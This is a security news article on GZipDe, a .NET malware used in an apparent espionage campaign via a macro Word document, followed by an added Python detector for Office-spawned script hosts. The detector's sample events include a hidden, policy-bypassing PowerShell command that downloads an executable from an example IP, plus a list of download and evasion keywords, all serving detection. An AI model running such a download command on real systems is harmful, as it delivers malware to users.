Security researchers from AlienVault have discovered a new malware family, named “GZipDe”, which appears to be in use in an active cyber-espionage campaign. The researchers found the malware this week after a user in Afghanistan uploaded a Word document carrying it to VirusTotal.
The document also contained decoy text about the Shanghai Cooperation Organization Summit, a reference to Eurasian political, economic and security topics.
VirusTotal does not reveal who uploaded a sample. “We’ve only seen one sample of the malware,” Chris Doman, a security researcher with AlienVault, said. “It seems very targeted,” Doman added. “Given the decoy, the document is in English and uploaded from Afghanistan, it may have been targeting someone in an embassy or similar there.”
According to Doman, the Word file is the first step of the infection chain. The document lures the user into enabling macros; the embedded Visual Basic macro then launches PowerShell, and the PowerShell script requests a PE32 executable that in turn drops the malware.
GZipDe is written in .NET and uses a custom encryption routine to obfuscate its process memory and evade antivirus detection. GZipDe then downloads a further, more potent payload from a remote server; that second-stage payload was found on a second server. The AlienVault team used Shodan, which scans open servers across the Internet, to learn the details of that payload.
GZipDe drops a Metasploit-based backdoor; Metasploit is a framework that penetration testers use to probe systems for weaknesses.
“This shellcode loads the entire DLL into memory, so it’s able to operate while writing no information to disk. […] From this point, the attacker can transmit any other payload in order to acquire elevated privileges and move within the local network.”
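Because the later stages of this chain run in memory and leave little on disk, the most reliable place for a defender to catch it is the first step: an Office application spawning a script host that reaches out for a second stage. The following detection logic is an added example, not code from AlienVault or the article; the process-creation events, process names and the 203.0.113.10 address are constructed for illustration and do not come from the campaign.

```python
import ntpath

# Office applications that should not normally spawn a script interpreter.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Script hosts that a malicious macro typically launches.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Command-line fragments that suggest a download-and-execute second stage.
DOWNLOAD_MARKERS = ["downloadfile", "downloadstring", "invoke-webrequest", "http://", "https://",
                    "iex", "invoke-expression", "-enc", "bypass", "hidden"]

# Constructed process-creation events (hypothetical, not real telemetry), shaped like
# the chain in the article: Word -> PowerShell -> request for a PE32 executable.
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 3300, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\user\Downloads\SCO_Summit.docx"'},
    {"pid": 4588, "ppid": 4120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"(New-Object Net.WebClient)"
                ".DownloadFile('http://203.0.113.10/stage.exe','C:\\Users\\user\\AppData\\Local\\Temp\\stage.exe')\""},
    {"pid": 5011, "ppid": 3300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -Command Get-Date"},  # benign: parent is not an Office app
]

def _basename(path: str) -> str:
    return ntpath.basename(path).lower()

def office_ancestor(event: dict, by_pid: dict, max_depth: int = 5) -> str:
    # Walk up the parent chain (bounded); return the Office image name if one is found.
    for _ in range(max_depth):
        event = by_pid.get(event["ppid"])
        if event is None:
            return ""
        if _basename(event["image"]) in OFFICE_APPS:
            return _basename(event["image"])
    return ""

def detect_office_script_chain(events: list) -> list:
    # Flag script hosts spawned, directly or via cmd.exe, from an Office process;
    # escalate to "high" when the command line also carries download/execute markers.
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        ancestor = office_ancestor(e, by_pid)
        if _basename(e["image"]) not in SCRIPT_HOSTS or not ancestor:
            continue
        cmd = e["cmdline"].lower()
        markers = [m for m in DOWNLOAD_MARKERS if m in cmd]
        findings.append({"pid": e["pid"], "office_parent": ancestor,
                         "severity": "high" if markers else "medium", "markers": markers})
    return findings
```

Run against the constructed events, only the PowerShell process launched by WINWORD.EXE is reported, rated "high" because its command line carries download and evasion markers; the unrelated PowerShell session is ignored.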